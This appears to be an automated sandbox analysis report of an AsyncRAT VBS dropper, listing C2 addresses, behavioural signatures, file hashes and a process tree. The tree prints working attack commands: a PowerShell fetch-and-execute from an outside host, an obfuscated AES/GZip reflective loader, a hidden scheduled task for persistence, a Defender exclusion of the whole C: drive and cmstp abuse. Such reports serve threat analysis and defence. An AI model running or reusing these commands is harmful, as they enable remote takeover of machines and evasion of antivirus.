Analysis

  • max time kernel
    132s
  • max time network
    153s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    09-12-2024 20:19

General

  • Target

    1821_output.vbs

  • Size

    61KB

  • MD5

    6943e4c37b93c2a81a98a81e36d2d5ce

  • SHA1

    ad2ba17165344f88b6bf0befaac528feb8a3280f

  • SHA256

    57bf3620d73728f07bed5cd48af70ca89dc70721b62c084f5f0feebed7f81a4f

  • SHA512

    78034880a195d5dc7729a6c7631a660f9945dd368a86b50b458e70e0191a7953ba47435c242c94ce8548832e4920e08949fcb1aa099d5d7b927da9bc9b69cf80

  • SSDEEP

    768:ni1+nYY2MDjo2CLlIbkrMvrIzkoILj2AA3drdg8KCklQCdUq13ZZIwX+Ay6Iwcgh:iXvlIkgvrWC3ASCk0q13HX+C9czhG

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

jt8iyre.localto.net:55644

jt8iyre.localto.net:2101

Mutex

WzRdrlEJS302

Attributes
  • delay

    3

  • install

    false

  • install_file

    dwmm.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1821_output.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4512
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1956
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3672
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fsmdoohk\fsmdoohk.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2084
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74B3.tmp" "c:\Users\Admin\AppData\Local\Temp\fsmdoohk\CSC4115BC25D9434BB481D7F6A29458040.TMP"
            5⤵
              PID:3648
          • C:\windows\system32\cmstp.exe
            "C:\windows\system32\cmstp.exe" /au C:\windows\temp\snddvwko.inf
            4⤵
              PID:4200
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2356
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('przvDUO3TwKRjvdqBS3ijZmAMoLKmapNSNZNxjSSlQU='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j86NpELwD0eEb75+pqv1Rw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4396
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_884_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\latencyx884.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2960
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\latencyx884.vbs"
              4⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3408
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\latencyx884.bat" "
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4104
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('przvDUO3TwKRjvdqBS3ijZmAMoLKmapNSNZNxjSSlQU='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j86NpELwD0eEb75+pqv1Rw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Roaming\latencyx884.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:412
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2912
      • C:\Windows\system32\taskkill.exe
        taskkill /IM cmstp.exe /F
        1⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1980

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        3eb3833f769dd890afc295b977eab4b4

        SHA1

        e857649b037939602c72ad003e5d3698695f436f

        SHA256

        c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

        SHA512

        c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        f8634c179c1a738e20815ec466527e78

        SHA1

        5ff99194f001b39289485a6c6fa0ba8b5f50aa42

        SHA256

        b97b56e7ceecc7fe39522d3989d98bd233353d0269a7f6517e4a8286b4ed1dc4

        SHA512

        806b40ab4b2cd38140210d1bff3317d51af96008526298aee07e67fa858d5e9646ba594d87a5f22ec5026ee25b93f62d600eb6da92216dfb524b28260fa7388f

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        18KB

        MD5

        16fcc22ced559bce1ac309545c136b0d

        SHA1

        242e28166bef71da7c48c9529e439e4fc1cd4fbc

        SHA256

        3eaba6a584c39d686dbbeb84eed5d573c88bee2400be4da891b7573f9946f618

        SHA512

        a4f88aa62a37a21edc0ba0515e6a61727a786016dc42652cc907a47190872384a9f8204620ed83b15e432dc9a92a0a8d6c62ebb6e42f4006dd3b43d5aafc0b44

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        05e3b8220f0cb53d09a7f4fa48ad262c

        SHA1

        a7148bf2b015db01c0b2dc874b489de129fd8110

        SHA256

        5ecdde362d366769de6f0dec3a9103af8e1b9d6fe0e961b02c30dbcb16fe059a

        SHA512

        9cb417e1b0504819817ec7fee457eab6c34a79dc5d71eef085bb3110731338b05779aafcc129ab050cb0ae1329a2b9eb3e4d39f018555a7aa4e98164220edd7e

      • C:\Users\Admin\AppData\Local\Temp\RES74B3.tmp

        Filesize

        1KB

        MD5

        2b634fa514a125b14a245950e7d57d8b

        SHA1

        7d4f119d2974e3f27a262e01441fbad4c150d613

        SHA256

        860d38689ead2f11f3ab5f19e27852cb51ee8dfb5972b24c5f6c6ce820977b28

        SHA512

        d159fdbef1a5c87b4d9307be117197ca1887aed62d5f9eaf4f420d62326428896a67baa6ea62b5834818d0e7f2382ad0104b3c1be02f531e91178dfe312e26e0

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2ubw1ivz.kyk.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\c.bat

        Filesize

        53KB

        MD5

        5658af2134929280550a46a39d5d1254

        SHA1

        757ce11f87e3886b0320fca0bd6bf1f26968a25e

        SHA256

        942cc99875f60e2aef139a7d8e8341409d2dd4625573f32cbe292124838cdeed

        SHA512

        e7ac74d0f9182d563dcb5765c160bec3ea4ede13a0a2612bafc5c8451393f3646430c340df57f1ad02807d9b610f55da0db2c67d531de21e91c21ebfe3cea1c8

      • C:\Users\Admin\AppData\Local\Temp\fsmdoohk\fsmdoohk.dll

        Filesize

        4KB

        MD5

        ed890784852fe007610a8b78fa316fa6

        SHA1

        c868e8be8c6889fb5d8c31ae8726c671715317da

        SHA256

        d1ecdbfb3db75816c8163c62dc202c1ee183c1d0632d035447e1cf3ac7957a1f

        SHA512

        c16430b5ce1be2a4be37ec2240a109440de5c74021bc8539b3bb96b28e382fb22bcb0500dbc95a0b18ad21becb460e42580317bceea172ffeb64dbad1c7d3529

      • C:\Users\Admin\AppData\Roaming\latencyx884.vbs

        Filesize

        111B

        MD5

        df4762b603df3c2f7e9bb7bbd2335c7b

        SHA1

        b7255dfdf4bb538449386764917dd094d0f55c2f

        SHA256

        06e6aad34e9eda68485604429fa6282bc02a24a027e0213d1d3230f878433d80

        SHA512

        2cb8d07f72f0a744d49457762ea134311432f067df4340f95ec2af6bb6d7403f77c4458de4659270b9dc3e34ffe593f74ac17eaec52c0a18e55720703aeb36b4

      • C:\windows\temp\snddvwko.inf

        Filesize

        683B

        MD5

        a4fd12b94ad4ac06fabd8dd56dd5ff2b

        SHA1

        940d129205e04ba31b10a72d7a7a236a9ed0488b

        SHA256

        fe9977d49d2ae366779da959a5c9a6cc7664bc82d7c8e243f1baa9aa539cd320

        SHA512

        a4712ad7a23ab7a1eadfdaa7dc73dc406a0a14313c0413561f2f4ba8087c79c504d1d4391585b1b91f580ffef3869a37523707979dd5ab870a596062497e79fe

      • \??\c:\Users\Admin\AppData\Local\Temp\fsmdoohk\CSC4115BC25D9434BB481D7F6A29458040.TMP

        Filesize

        652B

        MD5

        21a36acc5bfa32d113848b4b9b3eb31b

        SHA1

        b5301017bb09dee49ac00abb2c2badf6e0c16735

        SHA256

        1bcaecb5325c0d638ca58af3ee42d4e5d143eabb12e53cdda272481b1e1eb52a

        SHA512

        932d6072bcd4cd81b448275ca6313a6c2e8ad798b8102f72e5bb6e8272dac9691405ac94066e30266d91760e68fe090d506b40a15f9f09a5619a5421ffda80ed

      • \??\c:\Users\Admin\AppData\Local\Temp\fsmdoohk\fsmdoohk.0.cs

        Filesize

        2KB

        MD5

        897ac4306f2a2524bc3c441bd00c72b9

        SHA1

        1703dbf9a2a78491dfd6685540d4691839e33b69

        SHA256

        a889dd1616631e369d253d6d89cc3a253b663e636bb1cdebbf831817592b405b

        SHA512

        2eba96a7960fe4c8c083ffbca30dbff4c5aac6acfa2c99b6ab5802376d028cbf471c3f06fcef9a3a0129dc988df1aceba808c3436cd110c123dc2ba1147c81b6

      • \??\c:\Users\Admin\AppData\Local\Temp\fsmdoohk\fsmdoohk.cmdline

        Filesize

        369B

        MD5

        c0255eea7b843edebb6036dfcf90baf3

        SHA1

        78e7606fa3d98f1e0ebbf9205ac4c343b4ab85c6

        SHA256

        0a59d3fdb324bb8818c2662cda48247e88bd4d2b184e1859d74f91ac5a02850b

        SHA512

        7ee0c6cb70b86c06f2407e11a9c45d9b3708b077556f8299ba8000563643e0916e7ab33944293ccb14411c1697cec434fb81bd12e760f042395e5f5462a3f6c5

      • memory/412-128-0x00000000070C0000-0x00000000070D2000-memory.dmp

        Filesize

        72KB

      • memory/412-130-0x00000000075D0000-0x0000000007646000-memory.dmp

        Filesize

        472KB

      • memory/412-131-0x0000000007550000-0x00000000075B8000-memory.dmp

        Filesize

        416KB

      • memory/412-132-0x0000000007670000-0x000000000768E000-memory.dmp

        Filesize

        120KB

      • memory/412-133-0x0000000007EE0000-0x0000000007F72000-memory.dmp

        Filesize

        584KB

      • memory/2960-102-0x00000000079A0000-0x00000000079BE000-memory.dmp

        Filesize

        120KB

      • memory/2960-106-0x0000000007D00000-0x0000000007D11000-memory.dmp

        Filesize

        68KB

      • memory/2960-91-0x0000000007960000-0x0000000007992000-memory.dmp

        Filesize

        200KB

      • memory/2960-103-0x00000000079D0000-0x0000000007A73000-memory.dmp

        Filesize

        652KB

      • memory/2960-104-0x0000000007B70000-0x0000000007B7A000-memory.dmp

        Filesize

        40KB

      • memory/2960-92-0x0000000070940000-0x000000007098C000-memory.dmp

        Filesize

        304KB

      • memory/2960-105-0x0000000007D90000-0x0000000007E26000-memory.dmp

        Filesize

        600KB

      • memory/3672-13-0x00007FFEFA7A0000-0x00007FFEFB262000-memory.dmp

        Filesize

        10.8MB

      • memory/3672-49-0x00007FFEFA7A0000-0x00007FFEFB262000-memory.dmp

        Filesize

        10.8MB

      • memory/3672-44-0x00007FFEFA7A3000-0x00007FFEFA7A5000-memory.dmp

        Filesize

        8KB

      • memory/3672-45-0x00007FFEFA7A0000-0x00007FFEFB262000-memory.dmp

        Filesize

        10.8MB

      • memory/3672-27-0x000002136B100000-0x000002136B108000-memory.dmp

        Filesize

        32KB

      • memory/3672-14-0x000002136B350000-0x000002136B36C000-memory.dmp

        Filesize

        112KB

      • memory/3672-12-0x00007FFEFA7A0000-0x00007FFEFB262000-memory.dmp

        Filesize

        10.8MB

      • memory/3672-11-0x00007FFEFA7A0000-0x00007FFEFB262000-memory.dmp

        Filesize

        10.8MB

      • memory/3672-0-0x00007FFEFA7A3000-0x00007FFEFA7A5000-memory.dmp

        Filesize

        8KB

      • memory/3672-10-0x000002136B120000-0x000002136B142000-memory.dmp

        Filesize

        136KB

      • memory/4396-73-0x0000000006440000-0x000000000645E000-memory.dmp

        Filesize

        120KB

      • memory/4396-80-0x0000000008880000-0x0000000008E26000-memory.dmp

        Filesize

        5.6MB

      • memory/4396-79-0x0000000007820000-0x000000000782E000-memory.dmp

        Filesize

        56KB

      • memory/4396-78-0x00000000076C0000-0x000000000775C000-memory.dmp

        Filesize

        624KB

      • memory/4396-77-0x00000000075E0000-0x00000000075E8000-memory.dmp

        Filesize

        32KB

      • memory/4396-76-0x00000000075F0000-0x000000000760A000-memory.dmp

        Filesize

        104KB

      • memory/4396-75-0x0000000007C50000-0x00000000082CA000-memory.dmp

        Filesize

        6.5MB

      • memory/4396-74-0x0000000006490000-0x00000000064DC000-memory.dmp

        Filesize

        304KB

      • memory/4396-71-0x0000000005FD0000-0x0000000006327000-memory.dmp

        Filesize

        3.3MB

      • memory/4396-60-0x0000000005D60000-0x0000000005DC6000-memory.dmp

        Filesize

        408KB

      • memory/4396-61-0x0000000005E40000-0x0000000005EA6000-memory.dmp

        Filesize

        408KB

      • memory/4396-59-0x0000000005CC0000-0x0000000005CE2000-memory.dmp

        Filesize

        136KB

      • memory/4396-58-0x00000000055F0000-0x0000000005CBA000-memory.dmp

        Filesize

        6.8MB

      • memory/4396-57-0x0000000004DD0000-0x0000000004E06000-memory.dmp

        Filesize

        216KB